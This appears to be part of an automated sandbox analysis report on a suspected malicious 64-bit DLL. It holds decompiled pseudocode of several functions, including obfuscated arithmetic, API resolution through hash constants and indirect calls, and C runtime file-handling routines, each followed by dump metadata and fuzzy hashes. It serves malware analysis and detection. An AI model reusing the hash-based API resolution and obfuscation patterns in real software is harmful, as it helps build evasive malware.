                                				 *(_t215 + 0x27c) = ( *(_t215 + 0x27c) + 1) % _t153;
                                				_t190 = r10d -  *((intOrPtr*)(_t215 + 0x274));
                                				if (_t190 < 0) goto 0x130e1bd0;
                                				 *(_t215 + 0x58) =  *(_t215 + 0x48) * 0x3666;
                                				 *((intOrPtr*)( *((intOrPtr*)(_t215 + 0x208)) +  *(_t215 + 0x278) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t215 + 0x208)) +  *(_t215 + 0x278) * 4)) +  *( *((intOrPtr*)(_t215 + 0x210)) +  *(_t215 + 0x27c) * 4);
                                				if (_t190 >= 0) goto 0x130e1d11;
                                				_t206 =  *((intOrPtr*)(_t215 + 0x210));
                                				if ((( *(_t215 + 0x288) & 0x8000001f) - 0x00000001 | 0xffffffe0) + 1 == 0) goto 0x130e1d2c;
                                				r8d =  *(_t206 +  *(_t215 + 0x278) * 4);
                                				asm("inc ecx");
                                				goto 0x130e1d37;
                                				r8d =  *(_t206 +  *(_t215 + 0x278) * 4);
                                				r11d = r11d + 1;
                                				 *((intOrPtr*)( *((intOrPtr*)(_t215 + 0x208)) +  *(_t215 + 0x27c) * 4)) =  *((intOrPtr*)( *((intOrPtr*)(_t215 + 0x208)) +  *(_t215 + 0x27c) * 4)) + r8d;
                                				if (r11d -  *((intOrPtr*)(_t215 + 0x270)) < 0) goto 0x130e1ba0;
                                				_t225 =  *((intOrPtr*)( *(_t215 + 0x1c0) + 0x1b8)) - 0x2103;
                                				 *(_t215 + 0x198) = _t225;
                                				goto 0x130e1ed4;
                                				if ( *(_t215 + 0x100) - r9d +  *(_t215 + 0x188) <= 0) goto 0x130e1ed4;
                                				_t140 =  *(_t215 + 0x100);
                                				r10d = r10d & r9d;
                                				r8d =  *(_t215 + 0x188);
                                				_a8 = __rbp;
                                				_a64 = r10d;
                                				r10d =  *(_t215 + 0x130);
                                				r10d = r10d & _t140;
                                				_a16 = __rsi;
                                				r10d = r10d - 0x2598;
                                				r9d =  *(_t215 + 0xe0);
                                				_a24 = __r14;
                                				r14d =  *(_t215 + 0x120);
                                				r11d = r12d * 0x3666;
                                				r14d = r14d | r12d;
                                				_v40 = __r15;
                                				r14d = r14d + r8d;
                                				r15d =  *(_t215 + 0x90);
                                				r9d = r9d | 0x00001f2c;
                                				r9d = r9d ^  *(_t215 + 0x78);
                                				r15d = r15d & 0x00001a58;
                                				r15d = r15d | 0x00002001;
                                				r12d = r12d | 0x000027b2;
                                				_v56 = r15d;
                                				r11d = r11d ^ _t140;
                                				_v64 = r14d;
                                				_v72 = r13d & 0x00002598;
                                				_v80 = _t215;
                                				r8d = r8d - _t172;
                                				_v88 = _t225 + _t241;
                                				_v96 =  *(_t215 + 0x48) * r9d;
                                				_v104 = _a64;
                                				_v112 = r11d;
                                				_v120 = r10d;
                                				_v128 =  *((intOrPtr*)(_t215 + 0xb0)) + 0x00001f2c | r8d;
                                				_v136 = r12d;
                                				E00007FFC7FFC130FED60(( *(_t215 + 0x1c0) | 0x000036e7) -  *((intOrPtr*)(_t215 + 0x1b8)),  *(_t215 + 0xe0) ^ r13d ^ _t172, _t180, r9d +  *(_t215 + 0x188), _t215, _t225,  *(_t215 + 0x278),  *(_t215 + 0x100) ^ 0x00002103, _t241, _t242);
                                				 *((intOrPtr*)(_t215 + 0x200)) =  *((intOrPtr*)(_t215 + 0x200)) + (r13d ^ 0x0000343a);
                                				 *((intOrPtr*)(_t215 + 0x270)) = 0x73ba78;
                                				 *((intOrPtr*)(_t215 + 0x274)) = 0x6a;
                                				_t213 =  *((intOrPtr*)(_t215 + 0xc8));
                                				 *(_t215 + 0x1b0) =  *(_t215 + 0x1b0) | _t213;
                                				 *((long long*)(_t215 + 0xc8)) = _t213 - 1;
                                				return _t231 + 0x24c;
                                			}

                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 1cc0e5dd1aa9d6e56a01b4e7818d97780cc7f0b9dba7e65a148be762750f4ad4
                                • Instruction ID: 3d4f856c185adeedc897d26f9815f4c7f3fdc69164cbbe44332901cad9d56dc0
                                • Opcode Fuzzy Hash: 1cc0e5dd1aa9d6e56a01b4e7818d97780cc7f0b9dba7e65a148be762750f4ad4
                                • Instruction Fuzzy Hash: 39A15632609A858AE768CF25E0847E977A4F788B48F184139DF4E5B798CF38D591CB20
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 100%
                                			E00007FFC7FFC130F75E0(void* __rax, void* __rcx, void* __rdx, intOrPtr _a8, intOrPtr _a16, intOrPtr _a40, intOrPtr _a56, intOrPtr _a64, intOrPtr _a80, void* _a88, intOrPtr _a96) {
                                				void* _t45;
                                				void* _t50;
                                
                                				r10d = __rcx + 0x658;
                                				r8d = __rax + 0x14f3;
                                				_a96 = r8d;
                                				_a8 = __rax + 0x3bc;
                                				_a56 = __rdx + 0x216;
                                				r9d = _t50 - 0x27b2;
                                				r11d = _t50 - 0x3bc;
                                				_a16 = r11d;
                                				_a64 = _a40 + 0x2ad;
                                				if (r9d == __rcx + 0x102f) goto 0x130f76c5;
                                				if (r10d - _t45 - 0x1a27 < 0) goto 0x130f7994;
                                				_t46 = _a80;
                                				E00007FFC7FFC130EA280();
                                				 *((long long*)(_t46 + 0x158)) =  *((intOrPtr*)(_a80 + 0x1a0));
                                				return _t50 + 0xde3;
                                			}

                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: HeapProcess
                                • String ID:
                                • API String ID: 54951025-0
                                • Opcode ID: 872302a71949d7c02c6d14d4d3198623b2e87e13b17b480820a0ecdd06552e4a
                                • Instruction ID: ee9d1fb66d9c633184230375e44215820569598f7f57b19a315a5e1a04a18515
                                • Opcode Fuzzy Hash: 872302a71949d7c02c6d14d4d3198623b2e87e13b17b480820a0ecdd06552e4a
                                • Instruction Fuzzy Hash: AE9156736096C08BD361CF15F4457EABBA8F388788F10402ADB8957B58DB38E958CF00
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 55%
                                			E00000201201640C4540(void* __ebx, signed int __rax, long long __rbx, long long __rcx, void* __rdx, long long __rsi, long long __r9) {
                                				void* __rdi;
                                				long long* _t122;
                                				long long _t123;
                                				signed long long _t127;
                                				signed long long _t128;
                                				void* _t130;
                                				void* _t151;
                                				long long _t152;
                                				signed long long _t157;
                                				void* _t159;
                                				signed long long _t165;
                                				signed long long _t166;
                                				void* _t168;
                                
                                				_t122 = __rax;
                                				 *((long long*)(_t159 + 8)) = __rbx;
                                				 *(_t159 + 0x10) = _t157;
                                				 *((long long*)(_t159 + 0x18)) = __rsi;
                                				_t155 =  *0x640cd458;
                                				_t152 = __r9;
                                				_t130 = __rcx;
                                				if (__r9 != 0) goto 0x640c4577;
                                				goto 0x640c4770;
                                				r8d = 0x10;
                                				0x640c47b0(_t168, _t165, _t151);
                                				E00000201201640C908C(0x9ffc4c27, __rax,  *((intOrPtr*)( *0x640cd458 + 0x10)));
                                				if (_t122 == 0) goto 0x640c459f;
                                				 *_t122();
                                				_t7 = _t130 + 0x88; // 0x88
                                				_t123 = _t7;
                                				_t166 = _t165 | 0xffffffff;
                                				 *_t123 = _t123;
                                				 *((long long*)(__rcx + 0x90)) = _t123;
                                				 *((long long*)(__rcx + 0xa0)) = E00000201201640C825C;
                                				 *(__rcx + 0x10) = _t166;
                                				 *((long long*)(__rcx + 0xa8)) = 0x201640c2304;
                                				 *((long long*)(__rcx + 0x98)) = 0x201640c1730;
                                				E00000201201640C908C(0xdc444c2b, 0x201640c1730,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				r13d = _t166 + 2;
                                				if (0x201640c1730 == 0) goto 0x640c4609;
                                				r9d = 0;
                                				r8d = 0;
                                				 *((long long*)(0x201640c1730))();
                                				goto 0x640c460b;
                                				 *((long long*)(__rcx + 0x20)) = 0x201640c1730;
                                				if (0x201640c1730 == 0) goto 0x640c474e;
                                				E00000201201640C908C(0xdc444c2b, 0x201640c1730,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (0x201640c1730 == 0) goto 0x640c463a;
                                				r9d = 0;
                                				r8d = 0;
                                				 *((long long*)(0x201640c1730))();
                                				goto 0x640c463c;
                                				 *((long long*)(__rcx + 0x30)) = 0x201640c1730;
                                				if (0x201640c1730 == 0) goto 0x640c474e;
                                				 *(__rcx + 0x38) =  *(__rcx + 0x38) & _t157;
                                				E00000201201640C908C(0x3ff22481, 0x201640c1730,  *((intOrPtr*)( *0x640cd458 + 0x18)));
                                				if (0x201640c1730 == 0) goto 0x640c466b;
                                				r8d = 0;
                                				 *((long long*)(0x201640c1730))();
                                				goto 0x640c466d;
                                				 *((long long*)(__rcx + 0x28)) = 0x201640c1730;
                                				 *(__rcx + 0x38) = 0x201640c1730;
                                				if (0x201640c1730 == 0) goto 0x640c474e;
                                				E00000201201640C240C(0, __rcx, __r9, __r9, _t155);
                                				 *_t130 = 0x201640c1730;
                                				E00000201201640C908C(0x176fdd38, 0x201640c1730,  *((intOrPtr*)(_t155 + 0x30)));
                                				if (0x201640c1730 == 0) goto 0x640c46b0;
                                				r8d = 6;
                                				 *((long long*)(0x201640c1730))();
                                				goto 0x640c46b3;
                                				_t127 = _t166;
                                				 *(_t130 + 0x10) = _t127;
                                				if (_t127 != _t166) goto 0x640c4714;
                                				E00000201201640C908C(0xb27f4910, _t127,  *((intOrPtr*)(_t155 + 0x30)));
                                				if (_t127 == 0) goto 0x640c46dd;
                                				 *_t127();
                                				goto 0x640c46df;
                                				if (0 != 0) goto 0x640c474e;
                                				E00000201201640C908C(0x176fdd38, _t127,  *((intOrPtr*)(_t155 + 0x30)));
                                				if (_t127 == 0) goto 0x640c4708;
                                				r8d = 6;
                                				 *_t127();
                                				goto 0x640c470b;
                                				_t128 = _t166;
                                				 *(_t130 + 0x10) = _t128;
                                				if (_t128 == _t166) goto 0x640c474e;
                                				_t32 = _t130 + 0x18; // 0x18
                                				E00000201201640C8470(_t128, _t130, 0x201640c2a8c, _t130, _t155, _t157, _t32);
                                				 *(_t130 + 8) = _t128;
                                				if (_t128 == 0) goto 0x640c474e;
                                				E00000201201640C908C(0x38e683e4, _t128,  *((intOrPtr*)(_t155 + 0x18)));
                                				if (_t128 == 0) goto 0x640c474a;
                                				 *_t128();
                                				goto 0x640c4791;
                                				E00000201201640C908C(0xc06f8334, _t128,  *((intOrPtr*)(_t155 + 0x18)));
                                				if (_t128 == 0) goto 0x640c4767;
                                				 *_t128();
                                				goto 0x640c476c;
                                				if (0x7f == 0) goto 0x640c4791;
                                				E00000201201640C2874(_t130, _t130, _t152, _t155);
                                				if (r13d == 0) goto 0x640c4791;
                                				E00000201201640C908C(0x9cb92d3f, _t128,  *((intOrPtr*)(_t155 + 0x30)));
                                				if (_t128 == 0) goto 0x640c4791;
                                				 *_t128();
                                				return 0x7f;
                                			}

















                                Memory Dump Source
                                • Source File: 00000000.00000002.631292957.00000201640C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000201640C0000, based on PE: true
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_201640c0000_loaddll64.jbxd
                                Similarity
                                • API ID: ErrorFreeHeapLast
                                • String ID:
                                • API String ID: 485612231-0
                                • Opcode ID: f62f74501b8a1f376dc91424def19afeb0dba0c971c8bdd2357202f4e6c04303
                                • Instruction ID: 5cde628924682c2e96c5223d22b7db5ba09d2e12200d5ae71615f47064e62240
                                • Opcode Fuzzy Hash: f62f74501b8a1f376dc91424def19afeb0dba0c971c8bdd2357202f4e6c04303
                                • Instruction Fuzzy Hash: 1561D721311B20D7FB609B21AC0A7DA62A9FB88794F184925AF5D437CFDF36D4208358
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 86%
                                			E00007FFC7FFC130F65F0(intOrPtr __ebx, intOrPtr __edx, signed int __rax, signed int __rdx, void* __r8, signed long long _a8) {
                                				intOrPtr _v12;
                                				intOrPtr _v16;
                                				intOrPtr _v20;
                                				void* _t25;
                                
                                				_t25 = __r8;
                                				r8d = 0;
                                				 *0x13124de0 = r8d;
                                				_t1 = _t25 + 1; // 0x1
                                				r9d = _t1;
                                				asm("cpuid");
                                				_v16 = r9d;
                                				_v16 = 0;
                                				_v20 = __ebx;
                                				_v12 = __edx;
                                				if (0 != 0x18001000) goto 0x130f6651;
                                				asm("xgetbv");
                                				_a8 = __rdx << 0x00000020 | __rax;
                                				r8d =  *0x13124de0; // 0x1
                                				r8d =  ==  ? r9d : r8d;
                                				 *0x13124de0 = r8d;
                                				 *0x13124de4 = r8d;
                                				return 0;
                                			}








                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: e6dd937c2acb30d00e6a2a6694bbe294dad4cbe04de7d1fc66be6ba8f802123c
                                • Instruction ID: f634ccda21d78dd371d6097baea794805e57d7d0e9e7b1a155a9fce9e968e511
                                • Opcode Fuzzy Hash: e6dd937c2acb30d00e6a2a6694bbe294dad4cbe04de7d1fc66be6ba8f802123c
                                • Instruction Fuzzy Hash: 69F044717186698AEBA5CF28BC0262977F0F7183D4BA08039D58D93A04DA3C9460CF14
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 87%
                                			E00007FFC7FFC130EE9E0(intOrPtr* __rax, long long __rbx, signed int* __rcx, char* __rdx, long long _a8) {
                                				long long _v24;
                                				signed int _t21;
                                				signed int _t24;
                                				void* _t39;
                                				char _t42;
                                				void* _t47;
                                				void* _t63;
                                				signed int _t69;
                                				signed int _t74;
                                				intOrPtr* _t89;
                                				char* _t93;
                                				char* _t94;
                                				char* _t96;
                                				char* _t98;
                                				char* _t99;
                                				void* _t100;
                                				void* _t101;
                                				void* _t119;
                                
                                				_t89 = __rax;
                                				_a8 = __rbx;
                                				_t21 =  *0x13124dc8; // 0x0
                                				_v24 = __rcx;
                                				asm("movsd xmm0, [esp+0x20]");
                                				asm("movsd [edi], xmm0");
                                				__rcx[2] = 0;
                                				__rcx[1] = _t21;
                                				if ( *__rdx != 0x20) goto 0x130eea1a;
                                				_t93 = __rdx + 1;
                                				if ( *_t93 == 0x20) goto 0x130eea12;
                                				if ( *_t93 == 0x61) goto 0x130eea40;
                                				if ( *_t93 == 0x72) goto 0x130eea35;
                                				if ( *_t93 != 0x77) goto 0x130eec5d;
                                				 *__rcx = 0x301;
                                				goto 0x130eea46;
                                				 *__rcx =  *__rcx & 0;
                                				__rcx[1] = 1;
                                				goto 0x130eea4d;
                                				 *__rcx = 0x109;
                                				__rcx[1] = 2;
                                				_t94 = _t93 + 1;
                                				r9b = 0;
                                				r11b = 0;
                                				r10b = 0;
                                				r8b = 0;
                                				if ( *_t94 == 0) goto 0x130eeb8b;
                                				_t42 =  *_t94;
                                				_t63 = _t42 - 0x53;
                                				if (_t63 > 0) goto 0x130eeb0c;
                                				if (_t63 == 0) goto 0x130eeafc;
                                				if (_t63 == 0) goto 0x130eeb79;
                                				if (_t63 == 0) goto 0x130eead0;
                                				if (_t63 == 0) goto 0x130eeac8;
                                				if (_t63 == 0) goto 0x130eeab6;
                                				_t47 = _t42 - 0xfffffffffffffff2;
                                				if (_t63 == 0) goto 0x130eeaad;
                                				if (_t47 != 4) goto 0x130eec5d;
                                				if (r10b != 0) goto 0x130eeb6d;
                                				 *__rcx =  *__rcx | 0x00000010;
                                				goto 0x130eeb04;
                                				asm("bts dword [edi], 0x7");
                                				goto 0x130eeb77;
                                				if (( *__rcx & 0x00000040) != 0) goto 0x130eeb6d;
                                				goto 0x130eeb75;
                                				r8b = 1;
                                				goto 0x130eeb6d;
                                				if (r11b != 0) goto 0x130eeb6d;
                                				_t24 =  *__rcx;
                                				r11b = 1;
                                				if ((_t24 & 0x00000002) != 0) goto 0x130eeb6d;
                                				 *__rcx = _t24 & 0xfffffffe | 0x00000002;
                                				__rcx[1] = __rcx[1] & 0xfffffffc | 0x00000004;
                                				goto 0x130eeb77;
                                				_t69 = r10b;
                                				if (_t69 != 0) goto 0x130eeb6d;
                                				 *__rcx =  *__rcx | 0x00000020;
                                				r10b = 1;
                                				goto 0x130eeb79;
                                				if (_t69 == 0) goto 0x130eeb65;
                                				if (_t69 == 0) goto 0x130eeb56;
                                				if (_t69 == 0) goto 0x130eeb44;
                                				if (_t69 == 0) goto 0x130eeb38;
                                				if (_t47 - 0x3a != 6) goto 0x130eec5d;
                                				if (( *__rcx & 0x0000c000) != 0) goto 0x130eeb6d;
                                				asm("bts eax, 0xe");
                                				goto 0x130eeb75;
                                				if (r9b != 0) goto 0x130eeb6d;
                                				asm("btr dword [edi+0x4], 0xb");
                                				goto 0x130eeb4e;
                                				if (r9b != 0) goto 0x130eeb6d;
                                				asm("bts dword [edi+0x4], 0xb");
                                				r9b = 1;
                                				goto 0x130eeb79;
                                				_t74 =  *__rcx & 0x0000c000;
                                				if (_t74 != 0) goto 0x130eeb6d;
                                				asm("bts eax, 0xf");
                                				goto 0x130eeb75;
                                				asm("bt eax, 0xc");
                                				if (_t74 >= 0) goto 0x130eeb71;
                                				goto 0x130eeb79;
                                				asm("bts eax, 0xc");
                                				if (1 != 0) goto 0x130eea5e;
                                				if (r8b == 0) goto 0x130eeb93;
                                				_t96 = _t94 + __rax + 1;
                                				if ( *_t96 == 0x20) goto 0x130eeb90;
                                				if (r8b != 0) goto 0x130eebaf;
                                				if ( *_t96 != 0) goto 0x130eec5d;
                                				__rcx[2] = 1;
                                				goto 0x130eec6d;
                                				r8d = 3;
                                				if (E00007FFC7FFC130F1B40(_t47 - 0x3a, _t96, 0x1310ed38, _t119) != 0) goto 0x130eec5d;
                                				goto 0x130eebd5;
                                				_t98 = _t96 + 4;
                                				if ( *_t98 == 0x20) goto 0x130eebd2;
                                				if ( *_t98 != 0x3d) goto 0x130eec5d;
                                				_t99 = _t98 + 1;
                                				if ( *_t99 == 0x20) goto 0x130eebdf;
                                				r8d = 5;
                                				if (E00007FFC7FFC130F1C08(1, _t89, _t99) != 0) goto 0x130eec0a;
                                				_t100 = _t99 + 5;
                                				asm("bts dword [edi], 0x12");
                                				goto 0x130eec53;
                                				r8d = 8;
                                				if (E00007FFC7FFC130F1C08(1, _t89, _t100) != 0) goto 0x130eec2d;
                                				_t101 = _t100 + 8;
                                				asm("bts dword [edi], 0x11");
                                				goto 0x130eec53;
                                				r8d = 7;
                                				if (E00007FFC7FFC130F1C08(1, _t89, _t101) != 0) goto 0x130eec5d;
                                				asm("bts dword [edi], 0x10");
                                				goto 0x130eec53;
                                				if ( *((char*)(_t101 + 8)) == 0x20) goto 0x130eec50;
                                				goto 0x130eeb9d;
                                				_t39 = E00007FFC7FFC130EE6A0(_t89);
                                				 *_t89 = 0x16;
                                				return E00007FFC7FFC130EE580(_t39);
                                			}






















                                APIs
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.632264364.00007FFC130E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFC130E0000, based on PE: true
                                • Associated: 00000000.00000002.631948100.00007FFC130E0000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.632387402.00007FFC13103000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633723411.00007FFC13118000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633858879.00007FFC13119000.00000008.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633873174.00007FFC13123000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.633880087.00007FFC13126000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_7ffc130e0000_loaddll64.jbxd
                                Similarity
                                • API ID: _invalid_parameter_noinfo
                                • String ID: $ $ $ $ $=$UTF-16LEUNICODE$UTF-8$a$ccs$r$w
                                • API String ID: 3215553584-2974328796
                                • Opcode ID: 1ecd3638b6b5b4803adb73e9b05685090d72192c7f812e774ce7cb5667e9f9cd
                                • Instruction ID: d9a1f6b03bdfcfdbed7ee447770e303240d7aa242ef540ab3fabfea4184fdd53
                                • Opcode Fuzzy Hash: 1ecd3638b6b5b4803adb73e9b05685090d72192c7f812e774ce7cb5667e9f9cd
                                • Instruction Fuzzy Hash: 26718C72F0DE7F86F7694A249A5433A2AD1AF1236CF189435CA1E625D1CB2CBC30D721
                                Uniqueness

                                Uniqueness Score: -1.00%

                                C-Code - Quality: 39%
                                			E00007FFC7FFC130F243C(signed int __ebx, void* __eflags, signed int __rbx, intOrPtr* __rcx, signed int* __rdx, signed int __rdi, void* __rsi, signed int __r8) {
                                				void* __rbp;
                                				signed int _t120;
                                				long _t134;
                                				void* _t137;
                                				void* _t139;
                                				void* _t140;
                                				signed int _t155;
                                				signed int _t156;
                                				signed char _t160;
                                				signed char _t161;
                                				void* _t185;
                                				void* _t186;
                                				signed int* _t207;
                                				intOrPtr* _t210;
                                				long long _t221;
                                				intOrPtr* _t229;
                                				signed long long _t237;
                                				intOrPtr _t251;
                                				signed long long _t252;
                                				signed long long _t272;
                                				signed long long _t273;
                                				signed int* _t278;
                                				void* _t281;
                                				void* _t282;
                                				signed int* _t284;
                                				void* _t285;
                                				void* _t293;
                                				void* _t295;
                                				void* _t300;
                                				void* _t303;
                                
                                				_t280 = __rsi;
                                				_t155 = __ebx;
                                				_t207 = _t284;
                                				_t207[2] = __rbx;
                                				_t207[4] = __rdi;
                                				_t207[6] = __r8;
                                				_t282 = _t207 - 0x47;
                                				_t285 = _t284 - 0xc0;
                                				r12d = r9d;
                                				r9d =  *(_t282 + 0x77);
                                				_t278 = __rdx;
                                				r8d =  *(_t282 + 0x6f);
                                				_t229 = __rcx;
                                				E00007FFC7FFC130F20A8(r12d, __eflags, _t207, __rcx, _t282 - 1, _t282);
                                				asm("movups xmm0, [eax]");
                                				asm("movups xmm1, xmm0");
                                				asm("psrldq xmm1, 0x8");
                                				asm("dec cx");
                                				 *(_t282 - 0x11) = _t303 >> 0x20;
                                				asm("movups [ebp-0x59], xmm0");
                                				asm("movsd xmm0, [eax+0x10]");
                                				asm("movsd [ebp-0x31], xmm0");
                                				asm("movsd [ebp-0x49], xmm0");
                                				if (r15d != 0xffffffff) goto 0x130f24c7;
                                				E00007FFC7FFC130EE680(_t207);
                                				 *_t207 =  *_t207 & 0x00000000;
                                				 *__rdx =  *__rdx | 0xffffffff;
                                				E00007FFC7FFC130EE6A0(_t207);
                                				goto 0x130f280e;
                                				_t120 = E00007FFC7FFC130F3C80(r12d, _t185, _t207, _t229, _t282 - 1, __rdx, __rdx, __rsi);
                                				 *__rdx = _t120;
                                				if (_t120 != 0xffffffff) goto 0x130f24eb;
                                				E00007FFC7FFC130EE680(_t207);
                                				 *_t207 =  *_t207 & 0x00000000;
                                				 *__rdx =  *__rdx | 0xffffffff;
                                				E00007FFC7FFC130EE6A0(_t207);
                                				 *_t207 = 0x18;
                                				goto 0x130f24bb;
                                				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
                                				r8d = r15d;
                                				 *(_t282 - 0x21) =  *(_t282 - 0x21) & 0x00000000;
                                				 *_t229 = 1;
                                				_t231 =  *(_t282 - 0x49) >> 0x20;
                                				_t156 = _t155 |  *(_t282 - 0x49);
                                				 *(_t285 + 0x28) = _t156;
                                				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
                                				 *(_t282 - 0x29) = 0x18;
                                				 *(_t282 - 0x19) =  !(r12d >> 7) & 0x00000001;
                                				 *(_t282 - 0x39) =  *(_t282 - 0x49) >> 0x20;
                                				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                                				r14d =  *(_t282 - 0x55);
                                				 *(_t282 - 0x41) = _t207;
                                				if (_t207 != 0xffffffff) goto 0x130f25df;
                                				if ((r14d & 0xc0000000) != 0xc0000000) goto 0x130f25ac;
                                				if ((r12b & 0x00000001) == 0) goto 0x130f25ac;
                                				 *(_t285 + 0x30) =  *(_t285 + 0x30) & 0x00000000;
                                				asm("inc ecx");
                                				 *(_t282 - 0x55) = r14d;
                                				r8d = r15d;
                                				 *(_t285 + 0x28) = _t156;
                                				 *((intOrPtr*)(_t285 + 0x20)) =  *((intOrPtr*)(_t282 - 0x51));
                                				CreateFileW(??, ??, ??, ??, ??, ??, ??);
                                				 *(_t282 - 0x41) = _t207;
                                				if (_t207 != 0xffffffff) goto 0x130f25df;
                                				_t237 =  *__rdx;
                                				_t210 =  *((intOrPtr*)(0x13124970 + (_t237 >> 6) * 8));
                                				 *(_t210 + (_t237 << 6) + 0x38) =  *(_t210 + (_t237 << 6) + 0x38) & 0x000000fe;
                                				E00007FFC7FFC130EE630(GetLastError(), _t210,  *(_t282 - 0x49) >> 0x20);
                                				goto 0x130f24bb;
                                				if (GetFileType(_t303) != 0) goto 0x130f263d;
                                				_t134 = GetLastError();
                                				E00007FFC7FFC130EE630(_t134, _t210,  *(_t282 - 0x49) >> 0x20);
                                				 *( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) =  *( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) & 0x000000fe;
                                				CloseHandle(_t300);
                                				if (_t134 != 0) goto 0x130f24bb;
                                				_t137 = E00007FFC7FFC130EE6A0(_t210);
                                				 *_t210 = 0xd;
                                				goto 0x130f24bb;
                                				if (_t137 != 2) goto 0x130f264a;
                                				goto 0x130f2652;
                                				if (_t137 != 3) goto 0x130f2652;
                                				_t160 =  *(_t282 - 0x59) | 0x48;
                                				E00007FFC7FFC130F3B9C(_t160,  *__rdx, _t186,  *(_t282 - 0x49) >> 0x20, _t207, __rdx, _t280, _t282, _t295, _t293);
                                				_t161 = _t160 | 0x00000001;
                                				 *(_t282 - 0x59) = _t161;
                                				 *( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x38) = _t161;
                                				 *((char*)( *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)) + ( *__rdx << 6) + 0x39)) = 0;
                                				if ((r12b & 0x00000002) == 0) goto 0x130f26b4;
                                				_t139 = E00007FFC7FFC130F22B4(_t161,  *__rdx, r12d & 0x0000003f,  *(_t282 - 0x49) >> 0x20, _t280);
                                				r13d = _t139;
                                				if (_t139 != 0) goto 0x130f26e3;
                                				asm("movups xmm0, [ebp-0x59]");
                                				asm("movsd xmm1, [ebp-0x31]");
                                				r8d = r12d;
                                				asm("movaps [ebp-0x1], xmm0");
                                				 *((char*)(_t282 - 0x61)) = 0;
                                				asm("movsd [ebp+0xf], xmm1");
                                				_t140 = E00007FFC7FFC130F1E14( *_t278,  *(_t282 - 0x49) >> 0x20, _t282 - 1, _t280, _t282 - 0x61);
                                				if (_t140 == 0) goto 0x130f26f2;
                                				r13d = _t140;
                                				E00007FFC7FFC130F5278( *_t278, r12d & 0x0000003f, _t185, _t140,  *((intOrPtr*)(0x13124970 + ( *__rdx >> 6) * 8)),  *(_t282 - 0x49) >> 0x20, _t280);
                                				goto 0x130f280e;
